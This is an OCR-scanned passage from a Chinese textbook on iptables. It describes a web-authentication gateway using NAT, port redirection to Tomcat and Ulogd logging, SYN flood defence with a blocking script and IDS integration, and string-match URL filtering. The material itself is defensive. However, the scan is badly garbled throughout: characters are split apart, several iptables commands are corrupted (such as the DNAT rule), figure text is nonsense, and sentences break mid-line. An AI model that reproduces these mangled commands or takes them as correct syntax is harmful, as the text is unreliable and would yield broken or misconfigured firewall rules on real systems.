iptables 是 在 Linux 操作 系统 下 基于 2.4 内 核 版 本 之 后 集成 的 网 络 安全 工具 , 该 工具 实现 了 
多 种 网 络 安全 功能 ， 如 数据 包 过 滤 、 状 态 保持 、NAT (Network Address Translation， 网 络 地 址 
转换 ) 、 抗 攻击 等 。 利 用 该 工具 可 以 在 较 低 配 置 下 的 传统 PC 机 上 实现 安全 稳定 、 功 能 强大 的 
防火 墙 +NAT 系统 ， 因 此 它 被 企业 和 高 校 广泛 采用 ， 成 为 一 种 比较 成 熟 的 技术 。 然 而 随 着 对 网 
络 安全 性 要 求 的 日 益 提 高 ， 用 户 认 证 功能 越 来 越 受 到 重视 ， 基 于 iptables 的 上 述 功 能 却 不 能 满 
足 这 一 需求 。 

Squid 是 Linux 平台 下 最 为 流行 的 代理 服务 器 ， 是 解决 用 户 上 网 认证 的 有 效 方法 。 但 是 
Squid 也 存在 着 一 些 缺 陷 ， 如 命中 率 和 效率 相对 低下 、 支 持 的 协议 类 型 有 限 、 需 要 在 客户 端 计 
算 机 上 对 浏览 器 或 其 他 网 络 软件 进行 设置 、 某 些 服务 对 代理 访问 有 限制 等 , 使 其 应 用 受到 很 大 
限制 。 透 明代 理 是 NAT (iptables) 和 代理 〈Squid) 的 完美 结合 ， 此 种 工作 方式 不 需要 在 客户 
端 浏览 器 或 其 他 网 络 工具 上 进行 任何 设置 ， 用 户 感 觉 不 到 代理 服务 器 的 存在 。 然 而 由 于 Squid 
不 支持 在 透明 代理 模式 下 启用 身份 认证 功能 ， 所 以 它 仍然 不 能 解决 用 户 认证 问题 , 且 Squid 自 
身 的 性 能 依然 存在 缺陷 。 


11.3.2 ”系统 应 用 模块 


为 了 解决 上 述 问题 ， 依 据 透 明代 理 的 实现 思路 ， 即 利用 iptables 将 发 往 80 端口 的 数据 包 
转发 到 Squid 服务 器 的 3128 端口 ,将 上 网 认证 工作 交 给 Squid 处 理 。 该 方法 实现 了 基于 iptables 
的 Web 认证 系统 , 它 既 发 挥 了 iptables 服务 NAT 性 能 上 的 优势 , 又 实现 了 用 户 上 网 认证 功能 。 

本 系统 主要 应 用 了 iptables 服务 的 防火 墙 功 能 、NAT 功能 、 端 口 转发 功能 ， 并 利用 Ulogd 
工具 实现 了 iptables 的 日 志 记录 功能 。 同 时 ， 在 Linux 系统 中 部 署 了 Tomcat 服务 器 ， 用 于 实 
现 用 户 认证 和 iptables 规则 的 修改 功能 。 

利用 iptables 规则 实现 防火 墙 具 有 很 高 的 灵活 性 和 稳定 性 ， 在 本 系统 中 防火 墙 安全 政策 定 


. 442 。 
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义 为 正面 列表 ， 即 将 INPUT、OUTPUT、FORWARD 等 规则 设置 为 DROP 来 禁止 所 有 的 数据 
包 通 过 ， 然 后 再 分 别 设置 规则 允许 合法 的 数据 包 通 过 ， 这 样 系统 的 安全 性 就 被 提高 了 。NAT 
功能 将 每 个 内 网 计算 机 节点 的 地 址 转换 成 一 个 外 网 IP 地 址 ， 使 之 能 够 访问 外 网 的 资源 ， 采 用 
该 方式 能 有 效 地 解决 二 级 单位 的 上 网 问题 。 端 口 转发 功能 也 就 是 重 定向 ， 当 iptables 服务 接收 
到 一 个 数据 包 后 , 不 是 转发 这 个 包 , 而 是 将 其 重 定向 到 系统 上 的 某 一 个 应 用 程序 ， 最 常见 的 应 
用 就 是 和 Squid 配合 使 用 ,使 其 成 为 透明 代理 .Ulogd 工具 将 iptables 的 访问 日 志 记 录 到 MySQL 
数据 库 中 , 便于 对 数据 进行 分 析 和 操作 ,同时 也 满足 了 公安 部 对 上 网 日 志保 存 的 要 求 , 在 本 系 
统 中 依据 数据 库 中 的 日 志 记 录 来 判断 计算 机 的 上 网 状态 。Tomcat 容器 是 一 款 优秀 的 Web 服务 
器 ， 它 可 与 Java 语言 程序 相 结 合 ， 用 来 实现 用 户 认证 和 对 Linux 系统 sh 脚本 命令 的 操作 ， 从 
而 实现 对 iptables 规则 的 动态 设置 。 


11.3.3 ”系统 功能 及 实现 方法 


1. 网 络 环境 
网 络 环境 如 图 11.11 所 示 ， 这 是 典型 的 三 层 网 络 结构 。 


核心 层 


atalyst 6509 


Catalyst 2950 


图 11.11 网 络 环境 


接 入 层 为 Cisco 2950 设备 ,负责 接 入 客户 端 计算 机 ， 并 划分 VLAN; 汇聚 层 为 Cisco 3650 
设备 ， 负 责 实 现 各 个 VLAN 之 间 的 互联 互通 ， 并 接 入 核心 层 设备 Cisco 6509。Linux 服务 器 安 
装 双 网 卡 作为 网 关 ， 负 责 内 网 与 外 网 的 连接 。 在 本 系统 中 内 网 设 为 192 网 段 ， 外 网 设 为 10 网 
段 , Linux 服务 器 内 网 网 卡 卫 地 址 设 为 192.168.1.254(eth0), 外 网 网 卡 卫 地 址 设 为 10.80.1.100 

(eth1) 。 为 了 实现 在 内 网 网 段 中 的 客户 端 计算 机 能 够 访问 外 网 , 需 在 核心 层 交换 机 Cisco 6509 
上 设置 一 条 路 由 信息 :ip route 0.0.0.0/0 192.168.1.254, 将 所 有 访问 外 网 的 数据 包 都 转发 到 Linux 
服务 器 上 ， 然 后 再 通过 NAT 方式 上 网 。 
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2. 系统 实现 

该 系统 在 Enterprise Linux AS 5.0 环境 下 实现 ， 其 流程 图 如 图 11.12 所 示 。 
客户 端 连接 ， 加 入 计算 机 
iptables 规 则 根据 日 志 信 息 


pe ps 


调用 Java 取 消 请 
用 户 数 求 用 户 计算 机 IP 


据 验 还 口 转发 规则 
非法 Ey” .| a 


图 11.12 系统 流程 图 


(1) 利用 iptables 实现 NAT 和 防火 墙 功能 : 防火墙 功 能 通过 在 iptables 中 配置 包 的 过 滤 
规则 来 实现 。 
NAT 功能 利用 如 下 命令 实现 : 


iptables =t natl =A PREROUTING =d: 10.80>1.100 =53! 192.168-1.254 = DMAT. ==to 
192=168=]:254 
iptables -t nat -A POSTROUTING -s 192.168.0.0/24 -o ethl -j SNAT --to 10.80.1.100 


通过 上 述 配 置 ， 内 网 的 计算 机 〈192 网 段 ) 可 以 通过 Linux 服务 器 的 NAT 功能 实现 对 外 
网 (10 网 段 ) 的 访问 ， 系 统 在 此 基础 之 上 实现 用 户 的 Web 身份 认证 。 


(2) 数据 端口 转发 : 与 透明 代理 的 实现 方法 类 似 ， 利 用 iptables 的 端口 转发 功能 ， 将 所 
有 访问 80 端口 的 数据 包 《〈 也 可 以 设置 其 他 端口 进行 更 精细 的 控制 ) 转向 本 机 Tomcat 的 8080 
端口 ， 实 现 用 户 认证 : 


iptables -t nat -A PREROUTING -s 192.168.1.111/32 -i eth0 -p tcp --dport 80 
-j REDIRECT --to-port 8080 


上 述 命令 实现 将 瑟 地 址 为 192.168.1.111 的 计算 机 发 往外 网 80 端口 的 请 求全 部 转发 到 
8080 端口 。 通 过 使 用 该 命令 将 要 控制 的 客户 端 计算 机 卫 加 入 iptables 的 规则 中 ， 从 而 实现 对 
该 计算 机 的 上 网 控制 。 

(3) 搭建 Web 用 户 认证 平台 : 在 Linux 服务 器 上 利用 Tomecat 实现 Web 认证 平台 , 设置 
监听 端口 为 8080， 并 用 JSP 语言 实现 用 户 认证 页 面 ， 所 有 访问 外 网 的 请 求 都 被 强制 转 至 该 页 
面 ， 进 行 身份 验证 ， 判 断 用 户 信息 是 否 合法 。 

(4) 认证 功能 的 实现 : 在 用 户 认 证 页 面 ， 获 取 用 户 信 息 和 客户 端 计算 机 的 他 地 址 ， 如 果 
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用 户 信息 合法 ,由 Tomcat 容器 调用 JavaBean 实现 iptables 规则 的 操作 , 在 Java 程序 中 认证 函 
数 和 iptables 规则 修改 函数 要 采用 异步 方式 实现 ， 这 样 可 以 减少 用 户 并 发 认证 时 的 数据 混乱 问 
题 ， 提 高 系统 的 稳定 性 。 该 功能 利用 Runtime.getRuntime.exec 《"cmd") 函数 运行 Linux 的 sh 
脚本 来 实现 , 将 用 户 验证 页 面 获 取 的 他 地 址 作为 参数 传 入 到 JavaBean 中 , 并 将 如 下 命令 行 ( 认 
证 通过 ， 取 消 该 计算 机 的 端口 转发 规则 ， 使 其 可 以 正常 上 网 ) 写 入 sh 脚本 : 


iptables -t nat -D PREROUTING-s 192.168.1.111/32 -i eth0 -p tcp --dport 80 -j 
REDIRECT --to-port 8080 


运用 Runtime.getRuntime.exec ("chmod a+x sh 脚本 ") 提升 该 脚本 文件 为 可 执行 权限 ; 之 
后 运用 Runtime.getRuntime.exec ("sh 脚本 ") 函数 运行 该 脚本 文件 ， 修 改 iptables 规则 ， 从 而 
取消 掉 对 该 计算 机 端口 转发 的 限制 ， 通 过 NAT 实现 上 网 功能 。 


(5) 上 网 日 志 的 记录 :通过 对 Ulogd 工具 的 配置 可 以 将 iptables 的 访问 日 志 记录 到 MySQL 
数据 库 中 ， 在 iptables 中 添加 如 下 规则 : 


iptables-A INPUT-p tcp --dport 80-j ULOG 
或 者 : 

iptables-A FORWARD-j ULOG 

可 以 记录 通过 iptables 的 访问 数据 包 。 


(6) 分 析 访 问 日 志 重 新 认证 : 通过 对 MySQL 数据 库 日 志 表 中 ip_saddr (IP 源 地 址 ) 字 
段 的 分 析 确定 每 台 计 算 机 是 否 在 持续 上 网 ， 可 以 设 定 一 个 时 间 间 隔 ， 如 果 超 过 该 间隔 ， 该 卫 
地 址 的 计算 机 没有 网 络 访问 数据 包 , 便 将 该 他 地 址 加 入 到 iptables 的 转发 规则 中 , 要 求 用 户 重 
新 认证 。 在 上 述 方法 的 实现 中 要 尽量 降低 服务 器 的 负担 ， 可 在 日 志 表 中 使 用 插入 触发 器 ， 对 新 
插入 的 日 志 记录 提取 其 源 地 址 , 同时 更 新 计算 机 下 信息 表 中 对 应 了 P 地 址 的 访问 时 间 ; 在 Tomcat 
中 设 定 定 时 器 函数 ， 每 隔 一 定时 间 间 隔 轮 询 该 计算 机 卫 信息 表 ， 对 访问 时 间 与 当前 时 间 差 值 
大 于 限定 值 的 计算 机 要 求 重新 认证 。 

通过 上 述 过 程 实现 了 基于 iptables 的 Web 用 户 身 份 验证 功能 。 


11.3.4 系统 性 能 与 优化 


目前 该 系统 认证 的 iptables 服务 、Tomcat 容器 和 MySQL 数据 库 都 位 于 同一 台 Linux 服务 
器 上 ， 客 户 端 计算 机 的 数量 是 1500 台 左 右 ， 上 网 用 户 的 并 发 访问 量 为 300 台 左右 ， 系 统 运行 
稳定 。 

为 了 进一步 提高 系统 的 性 能 ， 可 将 Web 认证 服务 器 与 数据 库 服务 器 放 在 另 一 台 Linux 服 
务 器 上 ， 以 提高 系统 效率 ; 同时 ， 通 过 进一步 对 iptables 日 志 字 段 信息 进行 分 析 ， 可 以 提高 用 
户 上 网 与 重新 认证 时 间 计算 的 精确 度 ， 从 而 在 Web 认证 的 基础 之 上 实现 计 费 功能 。 

基于 iptables 的 Web 认证 系统 解决 了 用 户 上 网 认证 、 上 网 记录 保存 、 卫 地 址 资源 匮乏 和 
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高 校内 二 级 单位 上 网 管理 不 便 等 问题 ; 且 该 系统 基于 Linux 操作 系统 , 对 硬件 设备 的 要 求 不 高 ， 
网 管 人 员 可 以 自行 搭建 ， 非 常 适合 在 高 校 和 企业 内 推广 使 用 。 


11.4 运用 iptables 防御 Syn Flood 攻击 


网 络 安全 是 各 种 网 络 应 用 面临 的 一 个 首要 问题 。 从 网 络 普及 的 那天 开始 , 网 络 犯罪 就 没有 
停止 过 ， 相 反 有 合演 愈 烈 之 势 。 研 究 发 现 ， 现 今 的 网 络 攻击 以 分 布 式 拒绝 服务 攻击 (DDoS ) 
为 主 。 其 中 ，SYN Flood 攻击 由 于 易于 实现 、 不 易 防 范 ， 已 成 为 黑客 攻击 的 终极 工具 。 因 此 ， 
研究 如 何 防范 和 抵御 SYN Flood 攻击 具有 重要 的 现实 意义 。 

netfilter 是 Linux 为 用 户 提供 的 一 个 专门 用 于 包 过 滤 的 底层 结构 ， 可 以 构建 在 Linux 内 核 
中 ; 而 iptables 则 是 netfilter 框架 中 的 一 个 模块 ， 使 用 户 可 以 访问 内 核 过 滤 规 则 和 命令 。 与 之 
前 的 防火 墙 体系 相 比 较 ，netfilter 具有 以 下 优点 : 


@ iptables 允许 建立 状态 防火 墙 ， 即 在 内 存 中 保存 穿 过 防火 墙 的 每 条 连接 。 这 种 模式 可 以 
有 效 配置 FTP 和 DNS 以 及 其 他 网 络 服务 。 

@ iptables 不 仅 能 够 过 滤 TCP 标志 任意 组 合 报 文 ， 还 能 够 过 滤 MAC 地 址 。 

@ 对 于 网 络 地 址 转换 (NAT ) 和 透明 代理 的 支持 ，netfilter 更 为 强大 并 易于 使 用 。 

@ iptables 能 够 阻止 某 些 DoS 攻击 ， 例 如 SYN Flood 攻击 。 


本 节 首 先 对 传统 的 SYN Flood 攻击 防御 方案 进行 简要 分 析 , 然 后 阐述 利用 netfilter iptables 
的 动态 包 过 滤 机 制 构建 防火 墙 来 抵御 SYN Flood 攻击 的 原理 , 最 后 提出 iptables 与 入 侵 检测 系 
统 (IDS) 的 集成 方案 ， 利 用 文件 作为 两 者 之 间 数 据 传递 的 载体 。 实 验 结 果 表 明 ， 这 种 方法 可 
以 有 效 对 抗 SYN Flood 攻击 。 


11.4.1 传统 的 SYN Flood 攻击 防御 方案 


SYN Flood 是 当前 最 流行 的 DDoS 攻击 方式 之 一 ， 它 利用 TCP 协议 缺陷 发 送 大 量 伪 造 的 
TCP 连接 请 求 ， 从 而 使 得 被 攻击 方 资源 耗 尽 (CPU 满 负荷 或 内 存 不 足 ) 。 由 于 SYN Flood 是 
通过 网 络 底层 对 服务 器 进行 攻击 的 ,攻击 者 可 以 任意 改变 自己 的 网 络 地 址 而 不 被 网 络 上 的 其 他 
设备 所 识别 。 受 攻击 者 一 旦 发 现 服务 器 不 再 接受 请 求 ,甚至 是 本 地 访问 的 速度 也 很 慢 , 就 应 使 
用 Netstat 检查 处 于 SYN_RECV( 半 连接 ?状态 的 连接 。 如 果 数 量 大 于 500 或 占 总 连接 数 的 10% 
以 上 ， 可 以 认定 其 系统 (或 主机 ) 遭 到 SYN Flood 攻击 。 

通常 ， 有 两 种 简单 的 方法 可 以 防御 SYN Flood 攻击 : 一 是 缩短 等 待 时 间 (SYN Timeout) 
并 增 大 队列 SYN 包 的 最 大 容量 (tcp max_SYN backlog) ; 二 是 设置 SYN Cookie。 但 是 ， 这 
两 种 方法 只 能 对 付 比较 原始 的 SYN Flood 攻击 。 缩 短 SYN Timeout 时 间 仅 在 对 方 攻 击 频 度 不 
高 的 情况 下 生效 ， 而 SYN Cookie 依赖 于 对 方 使 用 真实 的 IP 地址 。 如 果 攻 击 者 以 每 秒 数 万 条 
的 速度 发 送 SYN 报 文 , 同时 利用 SOCK_RAW 等 工具 随机 改写 IP 报 文中 的 源 地 址 , 那么 上 述 
方法 显然 无 法 生效 。 
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当然 ,也 可 以 利用 iptables 编写 功能 完善 的 防火 墙 。iptables 为 模块 化 结构 ， 管 理 方便 ， 易 
于 排 错 ， 是 一 种 功能 强大 的 实用 防火 墙 工具 。 但 是 ， 利 用 iptables 建立 的 防火 墙 系统 ， 即 使 能 
够 快速 发 现 网 络 出 现 问题 的 原因 , 也 不 可 能 在 第 一 时 间 内 调整 防火 墙 规则 来 响应 攻击 者 的 攻击 
行为 。 因为 当 遇 到 SYN Flood 攻击 时 再 加 载 防火 墙 启动 脚本 , 并 使 用 vi 对 iptables 规则 进行 编 
辑 , 以 便 阻塞 那些 发 出 恶意 攻击 数据 的 源 地 址 的 数据 报 , 所 有 这 些 工作 至 少 需要 耗费 一 两 分 钟 
的 时 间 。 对 于 SYN Flood 攻击 尤其 是 DDoS 攻击 ， 这 种 反应 速度 显然 是 跟 不 上 的 。 而 且 一 旦 
攻击 者 使 用 虚假 的 随机 IP 地 址 ， 上 述 方法 会 导致 网 络 的 严重 堵塞 。 若 要 再 次 修改 防火 墙 启 动 
脚本 来 阻止 攻击 , 只 能 被 动 地 跟 在 攻击 者 之 后 修补 漏洞 , 收效 甚 微 , 因此 , 在 网 络 受 到 攻击 时 ， 
通过 修改 防火 墙 规则 配置 脚本 ， 被 动 慌乱 地 对 攻击 做 出 快速 防范 反应 ， 显 然 是 不 现实 的 。 


11.4.2 ”基于 iptables 的 动态 包 过 滤 防 火 墙 


针对 上 述 SYN Flood 攻击 防御 方案 存在 的 不 足 , 解决 方案 是 创建 一 个 特殊 的 脚本 ipdrop， 
以 便 能 动态 插入 一 个 规则 来 阻塞 指定 的 他 。 通 过 该 脚本 阻塞 某 个 全 ， 只 需 几 秒 钟 就 可 以 实现 ， 
而 且 还 可 有 效 防止 手工 加 入 规则 导致 的 人 为 错误 。 这样, 阻塞 攻击 的 主要 任务 就 可 以 简化 为 确 
定 攻 击 源 地 址 了 。 

创建 ipdrop 脚本 的 关键 , 在 于 如 何 实现 规则 的 动态 添加 和 删除 。 例如 , 假设 10.10.138. 224 
已 经 确定 为 攻击 源 地 址 ， 添 加 的 规则 会 将 该 瑟 地 址 发 送 的 数据 报 全 部 过 滤 ， 但 是 一 段 时 间 之 
后 , 很 可 能 攻击 停止 并 且 该 主机 又 发 出 正常 的 连接 请 求 ， 此 时 应 删除 之 前 已 设 定 的 规则 。 采取 
的 方法 是 在 终端 中 输入 命令 ， 格 式 为 ip 地 址 on /off， 然 后 脚本 在 规则 库 中 相应 地 自动 添加 如 
下 规则 : 


iptables $0OPERATION INPUT -s [ip 地 址 ] -j DROP 


其 中 ，$OPERATION 变量 的 值 取 决 于 终端 命令 行 参数 中 是 使 用 on 还 是 off 模式 。 如 果 是 
on，$OPERATION 变量 的 值 即 为 “-I”( 插 入 ) ; 如 果 是 off, SOPERATION 变量 的 值 即 为 “-D” 
(删除 ) 。 当 iptables 行 被 执行 时 ， 特 定 的 规则 将 动态 地 插入 或 删除 。 例 如 : 


#ipdrop 10.10.38.124 on 
TP LOO 30.1246dr6D om 


ipdrop 脚本 将 立即 阻塞 10.10.38.124。ipdrop 脚本 可 以 和 任何 类 型 的 防火 墙 一 起 发 挥 作用 ， 
通过 该 脚本 阻塞 某 个 卫 将 是 非常 容易 的 工作 ， 只 需要 几 秒 钟 就 可 以 实现 。 但 是 ， 如 果 发 生 大 
规模 DDoS 攻击 ， 该 脚本 在 响应 速度 上 仍然 存在 局 限 。 即 使 攻击 方 使 用 的 都 是 真实 IP 地 址 ， 
也 需要 一 条 一 条 地 从 终端 中 输入 大 量 的 命令 , 这 将 是 极其 费时 费力 的 工作 , 显然 远 远 跟 不 上 攻 
击 速度 。 因 此 ， 更 好 的 办 法 是 将 ipdrop 脚本 与 入 侵 检 测 集成 在 一 起 ， 由 入 侵 检 测 软件 锁定 攻 
击 源 他 地址， 然后 自动 传递 到 iptables 中 ， 进 而 实现 地 址 过 滤 。 


11.4.3 iptables 和 入 侵 检测 软件 的 集成 
由 于 Linux 防火 墙 工作 在 网 络 层 , 因此 防火 墙 只 能 对 数据 包 的 卫 地 址 、 端 口 、 标 准 TCP / 王 
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标志 以 及 数据 包 的 连接 状态 等 信息 进行 检测 。 然而 对 于 网 络 的 总 体 安全 来 说 , 仅 对 网 络 层 的 协 
议 进行 安全 防范 是 远 远 不 够 的 , 还 必须 提供 基于 内 容 的 安全 保障 , 也 就 是 需要 对 应 用 层 的 数据 
进行 进一步 的 检测 。 对 于 netfilter/iptables 构架 来 说 ， 它 的 核心 是 一 个 基于 网 络 层 安全 检测 的 
系统 ， 并 不 能 完全 满足 安全 需求 ， 必 须 将 这 部 分 工作 交 给 其 他 的 入 侵 检测 系统 来 完成 。 工 作 在 
应 用 层 的 入 侵 检 测 系统 虽然 能 提供 高 层 协 议 的 监控 ， 但 它 不 能 对 信息 进行 有 效 屏蔽 。 因 此 ， 
netfilter/iptables 与 入 侵 检 测 集成 在 一 起 , 不 仅 能 提高 抗御 攻击 的 响应 速度 ， 也 是 提高 网 络 安全 
防御 能 力 的 需要 。iptables 和 入 侵 检测 软件 相 结 合 ， 常 见 的 方法 是 将 iptables 和 snort 联动 。 这 
种 方法 是 利用 snort 和 iptables 的 扩展 机 制 ， 采 用 iptables 的 字符 串 匹 配 技 术 来 转换 snort 的 规 
则 。 字 符 串 模式 匹配 技术 ， 就 是 直接 在 TCP/IP 的 包 体 数据 中 用 字符 串 模 式 匹 配 的 方式 检查 是 
否 包 含有 攻击 信号 的 内 容 。 这 样 就 可 以 结合 大 多 IDS 系统 (如 snort) 的 规则 模式 匹配 引擎 ， 
将 入 侵 规 则 信息 直接 加 载 到 iptables 的 规则 库 中 ， 用 字符 串 模式 匹配 的 方式 来 进行 分 析 判 断 ， 
从 而 实现 高 层 内 容 监 控 。 但 是 ， 字 符 串 匹配 技术 过 于 复杂 ， 对 于 IDS 系统 也 有 诸多 要 求 ， 在 
一 定 程 度 上 限制 了 其 使 用 范围 。 

解决 方案 是 采用 文件 作为 传输 数据 的 载体 ， 将 入 侵 检 测 系 统 和 iptables 结合 起 来 ， 如 图 
11.13 所 示 。 由 于 大 部 分 编程 语言 都 由 文件 操作 ， 所 以 不 论 入 侵 检 测 系 统 采用 什么 语言 编程 ， 
都 可 以 与 iptables 进行 数据 传递 。 因此， 采用 文件 作为 入 侵 检 测 系 统 向 iptables 传送 数据 的 方 
法 是 可 行 的 。 具 体 实现 时 ， 只 需 将 入 侵 检 测 系统 (snort 或 者 自己 编写 的 入 侵 检 测 系统 ) 获取 
的 非法 人 P 地 址 和 合法 的 他 地址 分 别 写 入 文件 , 传递 给 iptables 并 由 iptables 写 入 规则 库 。 一旦 
SYN Flood 攻击 发 生 时 ，iptables 的 任务 就 是 将 攻击 源 下 地 址 发 送 的 所 有 数据 报 全 部 丢弃 ， 从 
而 有 效 避 免 合 法 用 户 连接 请 求 的 大 量 丢 失 。 最 后 将 所 有 iptables 规则 都 写 入 脚本 ， 方 便 程 序 的 
执行 。 


入 三 一 法 
最 非法 Pp [| 
所 测 iptables 
法 上 > 系 | 

图 ”一 许 列表 读 取 列表 内 罕 。 失恋 

并 在 ptables 泽 | 

文件 加 相应 规则 
图 11.13 解决 方案 


11.4.4 测试 结果 和 分 析 


实验 环境 : 在 局 域 网 内 进行 了 一 系列 攻击 实验 ， 其 中 包括 两 台 攻击 计算 机 ， 在 Windows 
2003 操作 系统 上 执行 测试 程序 ， 如 图 11.14 所 示 ， 还 有 一 台 检 测 计算 机 (Red Hat Linux) 。 


.448 。 
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源 IP [ii0 玉 可 庙 DJ1025 


目标 IP 有 01036152 al 


攻击 的 


消息 ， 请 访问 归 白 网 络 论坛 。 作 者 的 ID 是 L007 
图 11.14 执行 测试 程序 


检测 计算 机 内 已 有 iptables 规则 脚本 ， 主 要 测试 文件 到 iptables 的 数据 传递 ， 故 默认 入 侵 
检测 系统 发 现 攻击 人 P 地 址 并 写 入 文件 列表 。 在 发 生 攻击 时 ， 必 定 有 大 量 的 网 络 会 话 处 在 
SYN_RECY 状态 ， 采 用 以 下 命令 查看 处 于 半 连 接 状 态 的 TCP 会 话 : 


#netstat -nat | grep SYN_RECV 
tcp 0 O10-10.38=21:1763 L0030.152:63L SYN_RECV 


tcp 0 0 10.10.38.21:859 10.10.38.152:631 SYN_RECV 
tcp 0 0 10.10.38.21:5278 10.10.38.152:631 SYN_RECV 
tcp 0 0 10.10.38.21:1425 10.10.38.152:631 SYN_RECV 
tcp 0 0 10.10.38.21:1698 10.10.38.152:631 SYN_RECV 
tcp 0 0 10.10.38.21:8653 10.10.38.152:631 SYN_RECV 


启动 脚本 后 ， 再 次 输入 上 述 命令 : #netstat -nat |grep SYN_RECV。 此 时 ， 查 找 不 到 在 网 络 
连接 中 处 于 SYN_RECY 状态 的 会 话 ( 在 Windows 系统 中 是 SYN_RECEIVED 状态 ) ,显示 处 
于 半 连 接 状 态 的 数据 报 都 已 经 过 滤 ， 也 就 是 系统 成 功 抵抗 了 SYN Flood 攻击 。 在 实际 测试 中 ， 
采用 多 台 计 算 机 同时 对 主机 进行 攻击 ， 来 模拟 大 流量 、 高 强度 SYN Flood 攻击 的 复杂 环境 ， 
同样 取得 了 比较 理想 的 结果 。 


11.4.5 性 能 优化 
通常 的 安全 策略 一 般 可 以 基于 以 下 两 点 制定 。 


(1) 准许 除 明 确 拒绝 以 外 的 全 部 访问 : 所 有 未 被 禁止 的 都 是 合法 的 。 
(2) 拒绝 访问 除 明 确 准 许 以 外 的 全 部 访问 : 所 有 未 被 允许 的 都 是 非法 的 。 


从 合法 的 和 非法 的 下 地 址 的 数量 来 看 , 在 发 生 SYN Flood 攻击 的 时 候 , 非法 的 下 地址 数 
量 显然 大 大 多 于 合法 的 人 P 地 址 数量 。 因 此 ， 只 要 设置 iptables 的 默认 策略 为 拒绝 iptables -P 
INPUT DROP、 读 取 合 法 的 了 P 地 址 的 规则 列表 即 可 ， 这 样 做 可 以 明显 提高 响应 的 速度 。 不 过 ， 
响应 速度 在 更 大 程度 上 还 是 取决 于 读 文 件 的 快慢 。 

SYN Flood 攻击 虽然 原理 简单 ， 但 是 造成 的 危害 却 十 分 严重 。 修 改 内 核 参 数 或 使 用 TCP 
Cookie 技术 只 能 在 一 定 程度 上 减轻 SYN Flood 攻击 的 影响 ; 单独 使 用 iptables 建立 包 过 滤 防 火 
墙 则 显得 势 单 力 薄 ， 而 且 只 有 在 遭受 到 攻击 后 才能 根据 数据 报 的 特征 〈 如 源 IP 地 址 ) 进行 包 
过 滤 ， 这 种 “亡羊补牢 ”的 做 法 对 于 大 规模 的 DDoS 更 是 收效 甚 微 。 将 入 侵 检 测 系统 和 包 过 
滤 系 统 相 结合 ， 是 一 种 比较 好 的 抗 SYN Flood 攻击 方法 。 文 件 的 灵活 性 使 得 大 多 数 入 侵 检 测 
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系统 与 iptables 能 够 进行 良好 的 集成 。 不 过 ， 使 用 文件 仍然 存在 响应 速度 上 的 缺 
方面 还 有 待 于 进一步 提高 。 
防御 DDoS 攻击 的 脚本 示范 如 下 : 


#!/bin/bash 


陷 ， 在 实时 性 


netstat -anlgrep SYN RECVIawk '{print$5}'|lawk -F: ‘'{print$1}'|sortluniq 


-clsort -rnlawk 
"fif ($1>5) print$2}'>/tmp/dropip 
for i in $(cat /tmp/dropip) 
do 
/sbin/iptables -I INPUT -s $i -j DROP 
echo “$i kill at ‘date‘” >>/var/log/ddos 
done 


11.5 iptables 过 滤 实例 


11.5.1 过滤 URL 


这 里 我 们 看 看 如 何 利用 iptables 过 滤 URL 目标 请 求 。 很 多 人 喜欢 在 上 班 时 间 看 视频 网 站 ， 


这 样 会 挤占 流量 ， 这 时 可 用 一 条 规则 来 阻止 视频 网 站 的 访问 请 求 : 


iptables -A FORWARD -m string -string “tudou.com” -algo bm -j DROP 


其 中 各 项 参数 的 意义 如 下 : 


@ -A FORWARD， 增 加 FORWARD 链 的 规则 ， 由 于 我 启用 了 路 由 功能 ( 
/proc/sys/net/ipv4/ip_forward )， 所 以 所 有 的 包 从 FORWARD 链 规则 走 了 
问 所 使 用 的 INPUT 或 OUTPUT。 


即 : echo 1 > 
， 而 是 直接 访 


@ -mstring， 使 用 string 功能 ，string 是 iptables 的 一 个 module， 也 就 是 做 字符 串 匹 配 的 。 
@ -string“xxxx"， 定 义 字符 串 内 容 ， 可 以 是 URL 里 的 任意 字符 ， 如 果 需 要 block 下 载 


某 些 类 型 的 文件 或 请 求 ， 这 个 有 很 大 的 发 挥 空间 ， 可 自由 想象 。 
@ -algobm， 设 置 字符 匹配 的 查询 算法 ， 一 般 默认 使 用 bm 算法 效果 就 可 


以 了 ， 另 外 还 


可 以 设置 kmp 算法 , 那 是 一 种 更 复杂 的 算法 ,详细 内 容 可 自行 参见 高 等 数学 里 的 资料 。 
@ -i DROP， 设置 符合 此 条 件 的 包 的 处 理 方式 ，DROP 即 是 丢 齐 ， 也 是 reject 的 意思 。 


如 果 没 有 设置 -p 的 参数 ， 那 么 默认 就 包括 所 有 协议 的 package 处 理 。 如 果 需 要 的 话 ， 也 可 
以 针对 性 地 设置 -p tcp 或 -p udp 等 指定 协议 种 类 。 如 果 有 必要 ， 也 可 以 针对 这 个 应 用 放 到 对 im 


软件 、p2p 软件 的 一 些 目标 的 过 滤 。 

这 种 方式 的 优点 是 效率 高 ， 几 乎 不 占用 多 余 系 统 资源 ， 而 有 些 硬件 路 由 器 
过 滤 功 能 经 常会 造成 系统 死机 。 缺 点 是 设置 目标 过 于 单一 ， 对 于 分 散 型 URL 无 
持 对 正则 表达 式 的 匹配 。 


集成 的 URL 
法 处 理 ， 不 支 
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11.5.2 ”过 滤 关键 字 
我 们 使 用 下 面 命令 过 滤 关 键 字 : 


# iptables -A FORWARD -m string --string "sex" -j DROP 
# iptables -VvL 
Chain INPUT (policy ACCEPT 878 packets, 80959 bytes) 


pkts bytes target prot opt in out source destination 
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes) 
pkts bytes target prot opt in out source destination 

0 0 DROP = any anywhere anywhere 


STRING match sex 
Chain OUTPUT (policy ACCEPT 743 packets, 70303 bytes) 
pkts bytes target prot opt in out source destination 


已 经 有 了 关键 字 过 滤 了 ， 如 何 检验 出 这 条 规则 有 效 呢 ? 


#iptables -vnLlgrep STRING 


5 859 DROP 二 0.0.0.0/0 0.0.0.0/0 
STRING match "sex" 
0 0 DROP ee 四 0.0.0.0 EL325368SLE SN 


STRING match "sex" 


这 时 在 Linux 下 用 lync www.sex.com 访问 网 站 ， 发 现 无 法 打开 页 面 ， 果 然 生 效 啦 ! 


11.5.3 iptables 过 滤 特 定 网 段 

#iptables -I INPUT -s ! 分 公司 外 部 IP -j DROP 

-s 可 以 是 子 网 形式 ， 比 如 192.168.xx.xx/24 之 类 的 网 段 形式 ， 但 是 如 果 你 用 的 iptables 是 
1.3.0 以 上 的 版 本 ， 就 可 以 用 -m iprange --src-range 192.168.1.0-192.168.2.0 之 类 的 网 段 形式 。 
11.5.4” 禁 上 某 些 网 站 


